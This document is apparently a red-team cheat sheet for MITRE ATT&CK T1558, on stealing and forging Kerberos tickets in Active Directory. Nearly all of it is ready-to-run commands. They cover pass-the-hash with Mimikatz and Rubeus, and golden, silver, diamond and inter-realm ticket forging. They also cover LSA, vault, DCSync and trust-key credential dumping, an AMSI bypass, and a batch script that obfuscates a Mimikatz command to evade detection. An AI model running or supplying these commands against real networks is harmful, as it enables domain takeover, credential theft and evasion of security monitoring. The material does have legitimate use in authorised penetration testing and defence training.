credentials / krb

Mitre Att&ck Entreprise: T1558 Steal and Forge Kerberos Tickets

Menu

• tools
• runas
• pass-the-ticket
  • pth
  • ptt
  • command-obfuscation
• forge
  • tgt
  • diamond
  • golden
  • silver
  • silver-ea
  • referral
• dump
  • vault
  • lsadump-lsa
  • lsadump-dcsync
  • lsadump-trust
• manipulate
  • cleartext-2-nthash
  • ccache-convert
  • krb-export
• which-os-what-creds

tools

_repo	_last_pushed	_stars	_watch	_language

runas

runas /user:XXX\XXX /netonly cmd
# Enter the password for XXX\XXX:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
iex (get-content .\amsibypass.txt)

$ExecutionContext.SessionState.LanguageMode
$ExecutionContext.SessionState.LanguageMode FullLanguage

$ErrorActionPreference = 'SilentlyContinue' # hide errors on out console

• /discov/setenv
• /discov/ad#iter

pass-the-ticket

pth

# load powershell with PTH
mimikatz.exe
privilege::debug
sekurlsa::pth /user:$ztarg_user_name /rc4:xxx  /domain:$zdom /dc:$zdom_dc_fqdn /run:"powershell -ep bypass"

# load cmd with PTH
Rubeus.exe -args asktgt /user:$ztarg_user_name /aes256:$ztarg_user_aes256k /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
${zloader} -Path .\Rubeus.exe -args asktgt /user:$ztarg_user_name /aes256:$ztarg_user_aes256k /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# load cmd with PTH / go to command-obfuscation for %Pwn% variable
Rubeus.exe -args %Pwn% /user:$ztarg_user_name /aes256:$ztarg_krb_aes256k /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

ptt

# ptt via DInvoke
C:\USers\Public\zloader.exe -path .\Rubeus.exe -args asktgt /user:$ztarg_user_name /aes256:$ztarg_user_aes256k /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# Request a TGT as the target user and pass it into the current session
# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
.\Rubeus.exe asktgt /user:$ztarg_user_name /rc4:$ztarg_user_nthash /ptt

# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
.\Rubeus.exe asktgt /user:$ztarg_user_name /rc4:$ztarg_user_nthash /createnetonly:C:\Windows\System32\cmd.exe

command-obfuscation

REM script file to obfuscate the token manipulation commands 
 @echo off
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
echo %Pwn%
C:\Users\Public\SafetyKatz.exe %Pwn% exit

forge

tgt

# inter-realm TGT / ZDOM TO ZFOREST
.\Loader.exe -path .\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:${zdom_fqdn} /sid:${zdom_sid} /sids:${zea_sid} /aes256:${zdom_krbtgt_aes256k} /netbios:${znbss} /ptt

# TO TEST
#cerbero ask -u $zdom_fqdn/$ztarg_user_name@ztarg_dc_fqdn --aes $ztarg_user_aes256k -k $zdom_dc_ip -vv
#cerbero ask -u $zdom_fqdn/$ztarg_user_name@ztarg_computer_fqdn --aes $ztarg_user_aes256k -k $zdom_dc_ip -vv
#
#./Rubeus.exe asktgt /user:$ztarg_user_name /password:$ztarg_user_pass /domain:$zdom /dc:$zdom_dc_fqdn /ptt
#Invoke-Mimi -Command '"sekurlsa::ekeys"'

diamond

• TGT modification, avoid detection of forged TGT without PREAUTH
• requires the KRBTGT$ account hash
• [+] Process : ‘C:\Windows\System32\cmd.exe’ successfully created with LOGON_TYPE = 9

#$zdom_krbtgt_aes256k=""
C:\Users\Public\Loader.exe -path .\Rubeus.exe -args diamond /krbkey:${zdom_krbtgt_aes256k} /tgtdeleg /enctype:aes /ticketuser:administrator /domain:${zdom_fqdn} /dc:${zdom_dc_fqdn} /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

golden

• TGT forging, there is no PREAUTH / Kerberos AS-REQ, AS-REP exchanges with the DC
• requires the KRBTGT$ account hash

#$zdom_krbtgt_aes256k=""
#$zdom_krbtgt_norid=""
# 01 # CMD TO RUN
C:\Users\Public\Loader.exe -path .\Rubeus.exe -args evasive-golden /aes256:${zdom_krbtgt_aes256k} /sid:${zdom_krbtgt_norid} /ldap /user:Administrator /printcmd
# 02 # BUILT CMD TO COPY/PASTE
C:\Users\Public\Loader.exe -path .\Rubeus.exe -args evasive-golden /aes256:${zdom_krbtgt_aes256k} /user:Administrator /id:500 /pgid:513 /domain:${zdom_fqdn} /sid:${zdom_krbtgt_norid} /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:152 /netbios:dcorp /groups:544,512,520,513 /dc:${zdom_dc_fqdn} /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

silver

• service account hash required to forgort a TGS
• it is mostly the machine account hash, valid for 30 days by default
• more silent than the golden ticket, no kerberos interaction with the DC (aka no AS-REQ, TGS-REQ)
• SPN service can be change by any valid one, not restricted to msds-AllowedToDelegateTo

# SILVER TICKET AS Domain Admin (DA)
#$zdom_krbtgt_aes256k=""
#$zdom_krbtgt_norid=""
C:\Users\Public\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/${zdom_dc_fqdn} /aes256:${zdom_krbtgt_aes256k} /sid:${zdom_krbtgt_norid} /ldap /user:Administrator /domain:${zdom_fqdn} /ptt

silver-ea

# 01 # forge a silver ticket AS Enterprise Administrator (EA) 
C:\AD\Tools>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/${zdom_fqdn} /rc4:${zforest_krbtgt_nthash} /sid:${zdom_sid} /sids:${zea_sid}-519 /ldap /user:Administrator /nowrap

# 02 # import the ticket
.\Loader.exe -path .\Rubeus.exe -args asktgs /service:http/${zforest_dc_fqdn} /dc:${zforest_dc_fqdn} /ptt /ticket:doIFX...==

Service Type	Service Silver Tickets
WMI	HOST RPCSS
PowerShell Remoting	HOST HTTP (WSMAN RPCSS)
WinRM	HOST HTTP
Scheduled Tasks	HOST
Windows File Share (CIFS)	CIFS
LDAP operations (DCSync)	LDAP
Windows RSAT	RPCSS LDAP CIFS
Windows RSAT	RPCSS LDAP CIFS

referral

# 01 #
#$zdom_sid
#$zdom_trustk
.\Loader.exe -path .\Rubeus.exe -args evasive-silver /service:krbtgt/${zdom_fqdn} /rc4:${zdom_trustk} /sid:${zdom_sid} /ldap /user:Administrator /nowrap

# 02 # import the ticket 
.\Loader.exe -path .\Rubeus.exe -args asktgs /service:cifs/${zdom_dc_fqdn} /dc:${zdom_dc_fqdn} /ptt /ticket:doIFX...==

dump

vault

# contains secrets for the: scheduled tasks, ...
Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'

lsadump-lsa

# dump lsa process
Invoke-Mimi -Command '"token::elevate" "lsadump::lsa /patch"'
Invoke-Mimi -Command '"token::elevate" "sekurlsa::evasive-keys /patch"'

lsadump-dcsync

# dcsync
#$znbss=""
#$ztarg_user_name="krbtgt"
#$zx=$znbss+"\"+$ztarg_user_name
.\Loader.exe -path .\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:${zx}" "exit"
Invoke-Mimi -Command '"token::elevate" "lsadump::dcsync"'

lsadump-trust

# dump the krbtgt of the forest
.\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

manipulate

cleartext-2-nthash

# compute nthash from clear-text password
cerbero hash $ztarg_user_pass -u $zdom_fqdn/$ztarg_user_name
$ztarg_user_nthash=""
$ztarg_user_aes256k=""

ccache-convert

# Convert linux to windows krb ticket :
ticketConverter.py $ztarg_user_name".ccache" $ztarg_user_name".krb"
cerbero convert -i $ztarg_user_name".ccache" -o $ztarg_user_name".krb"

krb-export

cd C:\tools\mimikatz\x64
mimikatz.exe privilege:debug
kerberos::list /export

which-os-what-creds